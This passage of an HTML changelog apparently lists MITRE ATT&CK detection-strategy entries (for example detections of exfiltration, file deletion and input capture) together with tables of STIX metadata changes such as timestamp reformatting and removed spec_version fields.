Guardrails</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.683000+00:00</td></tr></tbody></table></details><hr><h4>[DET0698] Detection of Exfiltration Over Alternative Protocol</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.683000+00:00</td></tr></tbody></table></details><hr><h4>[DET0615] Detection of Exfiltration Over C2 Channel</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.675000+00:00</td></tr></tbody></table></details><hr><h4>[DET0701] Detection of Exfiltration Over Unencrypted Non-C2 Protocol</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.691000+00:00</td></tr></tbody></table></details><hr><h4>[DET0629] Detection of Exploitation for Client Execution</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.667000+00:00</td></tr></tbody></table></details><hr><h4>[DET0666] Detection of Exploitation for Initial Access</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.671000+00:00</td></tr></tbody></table></details><hr><h4>[DET0665] Detection of Exploitation for Privilege Escalation</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.679000+00:00</td></tr></tbody></table></details><hr><h4>[DET0663] Detection of Exploitation of Remote Services</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.674000+00:00</td></tr></tbody></table></details><hr><h4>[DET0638] Detection of File Deletion</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.678000+00:00</td></tr></tbody></table></details><hr><h4>[DET0682] Detection of File and Directory Discovery</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.688000+00:00</td></tr></tbody></table></details><hr><h4>[DET0637] Detection of Foreground Persistence</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.691000+00:00</td></tr></tbody></table></details><hr><h4>[DET0676] Detection of GUI Input Capture</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.676000+00:00</td></tr></tbody></table></details><hr><h4>[DET0608] Detection of Generate Traffic from Victim</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.669000+00:00</td></tr></tbody></table></details><hr><h4>[DET0648] Detection of Geofencing</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.671000+00:00</td></tr></tbody></table></details><hr><h4>[DET0640] Detection of Hide Artifacts</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.669000+00:00</td></tr></tbody></table></details><hr><h4>[DET0694] Detection of Hijack Execution Flow</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 